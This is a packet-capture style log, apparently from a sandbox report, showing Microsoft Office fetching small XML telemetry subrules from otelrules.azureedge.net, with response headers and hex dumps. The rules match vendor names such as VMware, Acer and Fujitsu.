                                                                                                                                                                                        2024-11-24 01:13:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:28 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                        x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011328Z-15b8b599d88tr2flhC1TEB5gk400000003y0000000002vrf
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        22192.168.2.54973213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:28 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:28 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                        x-ms-request-id: f440515e-401e-0029-2e38-3c9b43000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011328Z-178bfbc474b9fdhphC1NYCac0n000000055000000000c26h
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        23192.168.2.54973313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:28 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:28 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                        x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011328Z-174c587ffdfcj798hC1TEB9bq400000003sg00000000stbk
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        24192.168.2.54973413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:28 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:28 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                        x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011328Z-178bfbc474bbbqrhhC1NYCvw7400000005dg000000008cu7
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        25192.168.2.54973513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:29 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:30 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                        x-ms-request-id: 000c37a0-d01e-002b-0920-3d25fb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011330Z-178bfbc474bpscmfhC1NYCfc2c00000003t000000000g8f0
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        26192.168.2.54973713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:30 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:30 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                        x-ms-request-id: caffefd3-a01e-003d-6e3c-3c98d7000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011330Z-178bfbc474bv7whqhC1NYC1fg4000000057000000000f0tk
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        27192.168.2.54973613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:30 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:30 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                        x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011330Z-174c587ffdfp4vpjhC1TEBybqw00000003rg00000000ad88
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        28192.168.2.54973813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:30 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:30 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                        x-ms-request-id: d05e48d4-001e-0065-1c06-3d0b73000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011330Z-178bfbc474bv587zhC1NYCny5w000000056000000000583d
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:30 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        29192.168.2.54973913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:30 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:30 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                        x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011330Z-174c587ffdfcb7qhhC1TEB3x7000000003u000000000a98e
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:30 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        30192.168.2.54974013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:32 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:32 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                        x-ms-request-id: feb62e3a-f01e-0085-1d2f-3c88ea000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011332Z-178bfbc474btvfdfhC1NYCa2en000000057g00000000kk5k
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
